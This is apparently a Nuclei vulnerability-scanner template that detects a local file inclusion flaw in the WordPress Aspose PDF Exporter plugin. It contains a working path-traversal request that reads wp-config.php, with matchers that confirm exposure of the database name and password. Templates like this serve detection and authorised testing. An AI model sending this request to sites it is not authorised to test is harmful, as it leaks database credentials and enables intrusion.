id: aspose-pdf-file-download

info:
  name: WordPress Aspose PDF Exporter - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Aspose PDF Exporter is vulnerable to local file inclusion.
  reference:
    - https://packetstormsecurity.com/files/131161
    - https://wordpress.org/plugins/aspose-pdf-exporter
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,aspose

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/01
